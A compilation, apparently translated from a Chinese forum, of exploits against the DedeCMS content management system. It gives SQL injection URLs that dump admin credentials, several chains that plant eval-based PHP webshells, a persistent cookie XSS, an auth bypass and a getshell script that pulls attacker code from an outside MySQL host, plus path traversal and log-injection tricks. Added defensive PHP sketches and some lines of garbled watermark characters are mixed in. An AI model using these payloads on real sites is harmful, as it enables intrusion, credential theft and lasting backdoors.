Dedecms 5.6 rss.php injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
The injection rides in an array key of the _Cs parameter. updatexml() raises an error whose message carries [uname:MID(pwd,4,16)] from dede_admin, i.e. the admin name and the 16-character MD5 form of the stored password.
DedeCms v5.6 embedded malicious code execution vulnerability
Register a member account and upload a "software" item; in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the item executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This variant writes x.php containing a one-line webshell: the two base64 strings decode to x.php and <?php eval($_POST[xiao])?>baidu, so the POST parameter (the "password") is xiao.
Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
The uid values are the UTF-8 bytes of 涛声依旧 sent to a site running in GBK; the injection depends on that charset mismatch between the layer that escapes the input and the one that decodes it.
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
(%23@__ is #@__, the placeholder DedeCMS replaces with the configured table prefix, so the query reads the admin table whatever the prefix is.)
DEDECMS all versions: gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser. It triggers the XSS and installs the "XSS rootkit": the decoded script stores the payload in a cookie named gotopage with a 365-day expiry. Note that IE8/9 block URL-based XSS of this kind, so their XSS filter must be disabled.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser. Whichever of the URLs below you then visit, our XSS fires, because the payload now comes from the cookie rather than from the query string.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
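The following is an added example, not code from the page or from DedeCMS. It models how the gotopage value reaches the login page and why the planted cookie keeps firing, and puts the vulnerable rendering beside a hardened one. Two things are assumptions reconstructed from the payload's shape rather than taken from the project's source: that the login template writes $gotopage raw into a hidden input's value attribute (which is why the payload starts with "><script>), and that DedeCMS registers $_GET, $_POST and $_COOKIE into globals in that order, so a cookie value overrides a query-string value. The default landing page is also assumed.

```php
<?php
// Added example (not DedeCMS code): cookie-backed persistence of the gotopage
// XSS, with the raw rendering beside an encoded-and-validated one.
declare(strict_types=1);

// Register request variables the DedeCMS way: later sources win, so the cookie
// planted in step 1 overrides whatever gotopage the URL carries (assumed order).
function resolveGotopage(array $get, array $post, array $cookie): string
{
    $gotopage = '';
    foreach ([$get, $post, $cookie] as $source) {
        if (isset($source['gotopage'])) {
            $gotopage = (string)$source['gotopage'];
        }
    }
    return $gotopage;
}

// Vulnerable rendering (assumed template shape): value interpolated raw into an attribute.
function renderVulnerable(string $gotopage): string
{
    return '<input type="hidden" name="gotopage" value="' . $gotopage . '" />';
}

// Hardened rendering: only accept a site-relative path (no scheme, no //host),
// then attribute-encode it; ENT_QUOTES covers both quote styles.
function renderHardened(string $gotopage): string
{
    if (!preg_match('#^/[A-Za-z0-9_./?&=-]*$#', $gotopage) || strpos($gotopage, '//') !== false) {
        $gotopage = '/dede/index.php';   // default landing page (assumption)
    }
    $safe = htmlspecialchars($gotopage, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="gotopage" value="' . $safe . '" />';
}

// Constructed inputs: the cookie the rootkit script sets, and a harmless URL value.
$payload = '"><script>alert(/xss rootkit!/)</script><x="';
$cookie  = ['gotopage' => $payload];
$get     = ['gotopage' => 'dasdasdasda'];

$value = resolveGotopage($get, [], $cookie);   // the cookie wins over the URL
echo renderVulnerable($value), "\n";           // the script tag lands in the page
echo renderHardened($value), "\n";             // rejected, falls back to the default
echo renderHardened('/dede/content_list.php?channelid=1'), "\n";
```

Encoding alone stops the breakout; the path check additionally removes the open-redirect use of gotopage, and neither fix matters unless the cookie is also ignored for this parameter, which the resolve function shows is where the persistence comes from.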
DeDeCMS (织梦) variable override getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.com www.webvul.com
');
echo "\r\n";
// url, aid and path are all required (see usage)
if (!isset($argv[3])) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath=/data/cache   aid=2 shellpath=/   aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url  = $argv[1];
$aid  = $argv[2];
$path = $argv[3];
$exp  = Getshell($url, $aid, $path);
// Crude success check: a "HTTP/1.1 200 OK" status line puts "OK" at offset 13,
// and the tag body served from the attacker's database echoes "OK" as well.
if (strpos($exp, "OK") > 12) {
    echo "\nExploit Success \n";
    if ($aid == 1) echo "Shell:".$url."/$path/data/cache/fuck.php\n";
    if ($aid == 2) echo "Shell:".$url."/$path/fuck.php\n";
    if ($aid == 3) echo "Shell:".$url."/$path/plus/fuck.php\n";
} else {
    echo "\nExploit Failed \n";
}

function Getshell($url, $aid, $path)
{
    $id   = $aid;
    $host = $url;
    $port = 80;
    // Form body: doaction points mytag_js.php at itself, and the _COOKIE[GLOBALS][cfg_*]
    // fields override the database settings so the tag body is fetched from the
    // attacker's MySQL server (host, user, password and database as hard-coded by the author).
    $content = "doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data  = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: close\r\n";   // was keep-alive, which would stall the read loop below
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock = fsockopen($host, $port);
    if (!$ock) {
        echo "\nNo response from ".$host."\n";
        return '';
    }
    fwrite($ock, $data);
    // Read the whole response; the original returned after the first line only.
    $exp = '';
    while (!feof($ock)) {
        $exp .= fgets($ock, 1024);
    }
    fclose($ock);
    return $exp;
}
?>
DedeCms v5.6-5.7 privilege bypass vulnerability (straight into the backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
(织梦网站后台 in the URL stands for the site's backend directory.) Change validate=dcug to the current captcha value and you are logged straight into the backend. The _POST[GLOBALS][cfg_*] parameters are the same variable override as above: the credential check is made against a database the attacker controls, which is why the otherwise meaningless admin/inimda pair works.
The prerequisite is knowing the backend path.
Dedecms (织梦) tag remote file write vulnerability
Prerequisite: you need your own dede database ready, then insert a row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
(The quotes above are un-doubled from the forum's escaped copy; the string handed to fwrite, the webshell body, is empty in the copy reproduced here.)
Then submit with the form below and the shell is 1.php in the same directory as mytag_js.php. Work out the mechanics yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction()">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="Submit" name="QuickSearchBtn"><br />
</form>
<script>
// Point the form at the target URL typed into the doaction field. The original
// defined this function but never called it; the onsubmit attribute above wires it in.
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
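The following is an added example, not code from the page or from DedeCMS: a command-line model of the request-variable registration in include/common.inc.php that both the getshell script and the form above abuse, beside a hardened variant. The real code does ${$_k} = $_v at global scope; here $symtab stands in for the global symbol table and $symtab['GLOBALS'] for the $GLOBALS array that the DedeSql class reads its connection settings from. The structure is a reconstruction and the attacker values are constructed; the hardened loop is this page's suggestion, not the vendor's patch.

```php
<?php
// Added example (not DedeCMS code): the two-stage override behind
// name="_COOKIE[GLOBALS][cfg_dbhost]", modelled on a plain array.
declare(strict_types=1);

// 5.6-era filter: only the top-level request keys are inspected.
function checkRequestVulnerable(array $request): bool
{
    foreach ($request as $k => $v) {
        if (preg_match('/^(cfg_|GLOBALS)/', (string)$k)) {
            return false;   // the original exits with "Request var not allow!"
        }
    }
    return true;
}

// 5.6-era registration: every key of $_GET, $_POST and $_COOKIE becomes a global.
// Stage 1: while walking _POST, the key "_COOKIE" replaces the real cookie array.
// Stage 2: the outer loop then walks that replacement, finds the key "GLOBALS"
// and overwrites the array the database class reads cfg_dbhost from.
function registerVulnerable(array &$symtab): void
{
    foreach (['_GET', '_POST', '_COOKIE'] as $source) {
        foreach ($symtab[$source] as $k => $v) {   // the $$_request indirection
            $symtab[$k] = $v;                      // the ${$_k} = $_v assignment
        }
    }
}

// Hardened variant: check every key at the moment it is registered and refuse
// anything that names a superglobal, a cfg_ setting or GLOBALS itself.
function registerHardened(array &$symtab): void
{
    foreach (['_GET', '_POST', '_COOKIE'] as $source) {
        foreach ($symtab[$source] as $k => $v) {
            if (preg_match('/^(cfg_|GLOBALS$|_)/', (string)$k)) {
                continue;
            }
            $symtab[$k] = $v;
        }
    }
}

function buildSymtab(array $post): array
{
    return [
        'cfg_dbhost' => 'localhost',
        'cfg_dbuser' => 'dede',
        'GLOBALS'    => ['cfg_dbhost' => 'localhost', 'cfg_dbuser' => 'dede'],
        '_GET'       => [],
        '_POST'      => $post,
        '_COOKIE'    => ['PHPSESSID' => 'constructed'],
    ];
}

// The DedeSql constructor takes its host from $GLOBALS['cfg_dbhost'], not from $cfg_dbhost.
function dbHostSeenByDedeSql(array $symtab): string
{
    return (string)$symtab['GLOBALS']['cfg_dbhost'];
}

// Constructed attacker POST: the shape PHP parses the form's field names into.
$attackerPost = [
    'doaction' => 'http://target/plus/mytag_js.php?aid=1',
    '_COOKIE'  => ['GLOBALS' => ['cfg_dbhost' => '184.105.174.114', 'cfg_dbuser' => 'exploit']],
    'nocache'  => 'true',
];

$symtab = buildSymtab($attackerPost);
var_dump(checkRequestVulnerable($attackerPost));   // passes: "_COOKIE" matches neither prefix
registerVulnerable($symtab);
echo 'vulnerable: ', dbHostSeenByDedeSql($symtab), "\n";

$symtab = buildSymtab($attackerPost);
registerHardened($symtab);
echo 'hardened:   ', dbHostSeenByDedeSql($symtab), "\n";
```

The essential point is that the original filter and the registration loop look at different data: the filter sees the key "_COOKIE", the loop later sees the key "GLOBALS" inside it. Any check that is not applied on the same key, at the moment it is written, can be bypassed by nesting.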
Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, go into the member area, publish an article and upload an image. Then, in attachment management, replace the image with our crafted template; say the image name is:
uploads/userup/2/12OMX04-15A.jpg
The template content (prepend GIF89a if the image format is checked):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and build a form like this (the templet and dede_addonfields fields are the crafted part):
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>Edit article</strong></h3>
<div class="postForm">
<label>Title:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>Tags:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(comma separated)
<label>Author:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>Category:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test category</option>
</select> <span style="color:#F00">*</span>(coloured categories cannot be selected)
<label>My category:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>Choose a category...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>Summary:</label>
<textarea name="description" id="description">1111111</textarea>
(short description of the content)
<label>Thumbnail:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(these two fields are the crafted part)
</div>
<!-- form action area -->
<h3 class="meTitle">Body</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; target=&quot;_blank&quot;><img border=&quot;0&quot; alt=&quot;&quot; src=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; width=&quot;1010&quot; height=&quot;456&quot; /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>Captcha:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="Can't read it? Click to refresh" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">Submit</button>
<button class="button2 ml10" type="reset">Reset</button>
</div>
</div>
</form>
Submit; if it reports that the edit succeeded, we have changed the article's template path.
3. Visit the edited article. Assuming its aid is 2, just request:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is written into the plus directory.
DEDECMS Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif, then use the form below to replace an existing attachment with it:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit">Change</button>
</form>
After uploading through this form the image is saved as /uploads/userup/3/1.gif.
Publish an article, then build the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>Choose a category...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">Submit</button>
</form>
Submitting it makes the uploaded gif the article's template; viewing the article (plus/view.php?aid=2, as in the previous section) then runs the runphp block.
Dedecms (织梦) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
The ../ segments after the expected /uploads/userup/ prefix walk back out of it, so whatever check is made on oldface, it evidently does not normalise the path before the delete.
Dedecms (织梦) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../
The code parameter is used to build an include path, so the ../ segments traverse out of the intended directory.
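The following is an added example, not code from the page or from DedeCMS: one containment check that would stop the three path-based bugs above (a member-supplied templet value, the oldface value passed to edit_face.php's delete, and the code value used as an include path in carbuyaction.php). It normalises the path lexically, so it runs without touching the filesystem; the directory roots are assumptions, and the inputs are the payloads from this page.

```php
<?php
// Added example (not DedeCMS code): lexical path containment for user-supplied
// relative paths, run over the templet, oldface and code payloads above.
declare(strict_types=1);

/**
 * Resolve $userPath against $root and return the absolute path, or null if the
 * result would leave $root. NUL bytes and backslashes are rejected outright,
 * since both defeat naive string checks (on Windows and in C-level file APIs).
 */
function resolveWithin(string $root, string $userPath): ?string
{
    if ($userPath === '' || strpos($userPath, "\0") !== false || strpos($userPath, '\\') !== false) {
        return null;
    }
    $root  = rtrim(str_replace('\\', '/', $root), '/');
    $parts = [];
    foreach (explode('/', $userPath) as $seg) {
        if ($seg === '' || $seg === '.') {
            continue;                    // "a//b" and "./a" are harmless
        }
        if ($seg === '..') {
            if (array_pop($parts) === null) {
                return null;             // tried to climb above $root
            }
            continue;
        }
        $parts[] = $seg;
    }
    return $root . '/' . implode('/', $parts);
}

// Constructed cases: root directory (assumed) and the value as it appears in each payload.
$cases = [
    ['/var/www/dede/templets',        '../uploads/userup/3/1.gif'],                        // templet
    ['/var/www/dede/uploads/userup',  '8/../../../member/templets/images/m_logo.gif'],     // oldface
    ['/var/www/dede/include/payment', '../../'],                                          // carbuyaction code
    ['/var/www/dede/templets',        'default/article_article.htm'],                     // legitimate
    ['/var/www/dede/templets',        'default/../default/index.htm'],                    // legitimate, ".." stays inside
];
foreach ($cases as [$root, $path]) {
    $resolved = resolveWithin($root, $path);
    printf("%-48s -> %s\n", $path, $resolved ?? 'REJECTED');
}
```

The lexical check is enough for the three payloads here because each one has more ".." segments than directories to climb. For a file that must exist, follow it with realpath() on the result and re-check the prefix, since a symlink inside the root can still point outside it and no string-level check sees that.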
6 D! z; |2 o: ]) k- `5 {/ [" n/ C2 ^* y5 S& z/ }3 B+ A, V
/ a+ F; \! o0 n; i0 J: Y' E% O6 i- q
6 V# F( Z, Z* ^. t9 C' P" J M
$ w; R, l8 [) T5 A1 B" d
. u, Z4 E* f; l& C2 o* {8 E* ~* j9 N
8 E4 d ]0 I" c; V8 @. ^4 P7 C
3 t2 X0 K- M N5 R. a/ [+ a0 x, _+ \) m* v, A
) {2 {, _: z# f& x' v
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL execution, note on the dump
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The pwd column returned for an admin is not a full hash: it is the 32-character MD5 with the first 5 and the last 7 characters removed, 20 characters in all. Remove 3 more from the front and 1 from the end and you have the 16-character MD5, which is the form crackers expect.
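The following is an added example, not code from the page: how the pwd column of dede_admin is derived, and how to check a candidate password against the forms the queries on this page return (the 20-character stored value from advancedsearch.php, or the 16 characters that the rss.php payload's MID(pwd,4,16) extracts). The sample password is constructed.

```php
<?php
// Added example (not DedeCMS code): the cut-down MD5 stored in dede_admin.pwd.
declare(strict_types=1);

// Stored form: 32-char md5 minus its first 5 and last 7 characters.
function dedeStoredHash(string $password): string
{
    return substr(md5($password), 5, 20);
}

// 16-char form cut from the stored value: drop 3 from the front, 1 from the end.
// MID(pwd,4,16) in the rss.php payload performs exactly this cut (MySQL is 1-indexed).
function dede16FromStored(string $stored20): string
{
    return substr($stored20, 3, 16);
}

// The same 16 characters taken straight from md5 at offset 8, the classic "16-bit MD5".
function dede16FromPassword(string $password): string
{
    return substr(md5($password), 8, 16);
}

// Accept whichever form was recovered and compare in constant time.
function matchesDedeHash(string $recovered, string $candidate): bool
{
    $recovered = strtolower($recovered);
    switch (strlen($recovered)) {
        case 32: return hash_equals($recovered, md5($candidate));
        case 20: return hash_equals($recovered, dedeStoredHash($candidate));
        case 16: return hash_equals($recovered, dede16FromPassword($candidate));
        default: return false;
    }
}

$password = 'admin';                                   // constructed sample
$stored   = dedeStoredHash($password);
echo 'stored (20): ', $stored, "\n";
echo 'cut to 16:   ', dede16FromStored($stored), "\n";
echo 'direct 16:   ', dede16FromPassword($password), "\n";
var_dump(dede16FromStored($stored) === dede16FromPassword($password));
var_dump(matchesDedeHash($stored, $password), matchesDedeHash($stored, 'wrong'));
```

For the sample password admin the 16-character form is the familiar 7a57a5a743894a0e, which is what you would hand to a cracker; note that 16 hex characters is still the full MD5 minus 16 known positions, so the cut does not add any security, it only confuses tools that expect 32.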
! l' B4 ]( U2 X# ]+ S: {3 K- o; r3 n" Z$ ?' b8 B5 J
8 q5 e6 s( A% v7 I2 m: Y- f+ _; A- h1 n2 ?
5 L& M2 K' p. V, ^1 a. M$ L
* Y5 J1 {+ N' A% Y# @/ \
, P; i& Y8 e; H0 c9 v4 ^
1 p2 s1 Z3 q& w, ~& ~$ J* u) x9 Z: `5 M- A/ ^
7 [, x( |# H6 z d. y' m2 ~5 l/ U
& o7 I3 y0 a- u% U
Dedecms (织梦) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
This is a second-order injection: the first query selects the double-quoted string as a column value, and that value is then used unescaped in a second query, where the inner union pulls userid and pwd from dede_admin.
Dedecms (织梦) select_soft_post.php uninitialised variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action="http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php" method="POST" enctype="multipart/form-data" name="myform">
<!-- The cfg_* values are normally set by the include chain; with register_globals on,
     the ones this script never initialises are taken from the POST instead, so php
     becomes an allowed upload type and cfg_basedir moves the target directory. -->
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='OK' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game, get a webshell at /data/cache/fly.php...<br />
</body>
</html>
Dedecms (织梦) 5.3 - 5.5 plus/digg_frame.php injection vulnerability
This combines a MySQL error forced by an out-of-range numeric value with the fact that DEDECMS records database errors in a PHP file (data/mysql_error_trace.php) whose header has no guard, so text injected into the record is executed when the file is requested.
1. Visit:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
(%65 is "e", so the id becomes 1024e1024, which MySQL rejects as an illegal double and takes the error path.) An error message is shown.
2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following proves the injection worked:
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
The mid value lands in the trace file ahead of the logged error: its */ closes the comment the file wraps its records in, eval($_POST[x]) and var_dump(3) run, and ?> drops PHP back into text mode, which is why int(3) is followed by the raw error text.
3. Open test.html from dede.rar; note that the form action is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
and the form posts the PHP to run in the x field that eval($_POST[x]) reads.
After clicking OK, seeing the step 2 output again means the trojan is in place.
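The following is an added example, not code from the page or from DedeCMS: a model of a database error trace written as a PHP file, the way the digg_frame.php chain above abuses it, beside a record format that cannot be turned into code. The record layout and file name are assumptions; the injected value is the page's own mid payload.

```php
<?php
// Added example (not DedeCMS code): log injection into a PHP-executed trace file.
declare(strict_types=1);

// Vulnerable shape: request data and the SQL text are pasted into a /* */ block
// inside a .php file, so a value containing "*/ ... ?>" escapes the comment.
function traceRecordVulnerable(string $requestInfo, string $sql, string $err): string
{
    return "<?php\n/*\nRequest: $requestInfo\nError: $err\nError sql: $sql\n*/ ?>\n";
}

// Hardened shape: one plain-text line per record, meant for a non-executable file
// outside the web root; comment and tag terminators are broken up so the record
// stays inert even if someone later serves it as PHP by mistake.
function traceRecordHardened(string $requestInfo, string $sql, string $err): string
{
    $clean = static function (string $s): string {
        return str_replace(["\r", "\n", '*/', '?>', '<?'], [' ', ' ', '* /', '? >', '< ?'], $s);
    };
    return sprintf("%s\t%s\t%s\t%s\n", gmdate('c'), $clean($requestInfo), $clean($err), $clean($sql));
}

// Cheap static check on a written record: does a "*/" appear before the writer's
// own closer? If so, attacker text has left the comment.
function escapesComment(string $record): bool
{
    $ownCloser = strrpos($record, "*/ ?>");
    $first     = strpos($record, '*/');
    return $first !== false && $ownCloser !== false && $first < $ownCloser;
}

$payloadMid = '*/eval($_POST[x]);var_dump(3);?>';    // from the URL in step 1
$sql = 'Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1;';
$err = "Illegal double '1024e1024' value found during parsing";

$bad  = traceRecordVulnerable("mid=$payloadMid", $sql, $err);
$good = traceRecordHardened("mid=$payloadMid", $sql, $err);
var_dump(escapesComment($bad));                                             // attacker's */ closes the comment early
var_dump(strpos($good, '*/') === false && strpos($good, '?>') === false);   // nothing left to execute
echo $bad, "\n", $good;
```

Neutralising the terminators is a backstop, not the fix: the fix is that diagnostics never go into a file the web server will execute, and the trace should be in a location that returns 403 or lives outside the document root entirely.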
* Q1 v0 @2 y2 n2 w9 {# g% g {. P% R1 w) @
1 B2 T" \9 \! W3 Q
P, }$ z a" S% ^9 W! C( R2 }
1 F% M# R \ I) Q2 i& a5 b: {: t7 S. r; E5 N3 g+ O% U
9 P7 d1 y9 @# G( Q& p1 z; P
- Y* t- r! W# _. j8 P
: d( x0 X, q/ ~5 p0 N
9 ]0 H7 z, K! Q3 ~2 b
# {8 q0 P; h# p& M. r
' [% Q+ b% }: B+ |. V2 c& Y! s- D& Q0 E" g+ F
Dedecms (织梦) plus/infosearch.php injection vulnerability
